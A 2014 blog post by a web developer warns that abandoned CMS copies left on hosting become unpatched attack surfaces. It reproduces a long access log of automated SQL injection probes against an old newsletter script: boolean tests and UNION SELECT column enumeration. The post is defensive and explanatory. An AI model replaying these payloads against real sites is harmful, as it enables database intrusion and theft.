leaving old CMS hanging around is really stupid idea

Autor Peeter Marvet | Avaldatud: 3. sept. 2014

When it comes to data I’m definitely packrat – and that’s a bad habit when updating websites. Yes, keeping old newsletter engine around so archives are accessible keeps linkrot under control but creates at the same time unpatched dungeons that nobody remembers about… and nobody ever updates, of course.

While looking at a hacked WordPress site about a year ago I found on the same hosting possibly 5 copies of Drupal – some ancient sub-site for something, backup copy of that, previous version and then some more instances. A survey engine, possibly remains of document management system … etc. Having deobfuscated the code of malware first lines turned out to be starting from root and looking for everything worth infecting. Impossible to fix, only solution is to archive the code (just-in-case…) and delete it.

And seems I should take some time to go systematically through all my / client hostings as this is not the only site with this problem – and I have left abandoned code around myself. That came back to me while looking for yet another breach and spotting the following lines in logfile:


176.10.100.229 - - [06/Jun/2014:14:19:54 +0300] "GET /newsletter/index.php?id=41 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:55 +0300] "GET /newsletter/index.php?id=999999.9 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:56 +0300] "GET /newsletter/index.php?id=999999.9%20or%201%3D1 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:56 +0300] "GET /newsletter/index.php?id=999999.9%27%20or%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:57 +0300] "GET /newsletter/index.php?id=41%20and%201%3D1 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:57 +0300] "GET /newsletter/index.php?id=41%20and%201%3E1 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:58 +0300] "GET /newsletter/index.php?id=41%27%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:58 +0300] "GET /newsletter/index.php?id=41%27%20and%20%27x%27%3D%27y HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:59 +0300] "GET /newsletter/index.php?id=41%22%20and%20%22x%22%3D%22x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:59 +0300] "GET /newsletter/index.php?id=41%22%20and%20%22x%22%3D%22y HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:00 +0300] "GET /newsletter/index.php?id=41%20and%201%3D1 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:00 +0300] "GET /newsletter/index.php?id=41%27 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:00 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:01 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:01 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:02 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:03 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:04 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:06 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:07 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:07 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:08 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:08 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:09 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:09 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:10 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:10 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:11 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:11 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:12 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:12 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:13 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:13 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:14 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:14 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:14 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:15 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:15 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:16 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:16 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:17 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:17 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:18 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:18 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:18 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:19 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:19 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:20 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:20 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:21 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:21 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:22 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:22 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:23 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:23 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:23 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:24 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:24 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:25 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:25 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:26 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:26 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:27 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:27 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:28 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:28 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
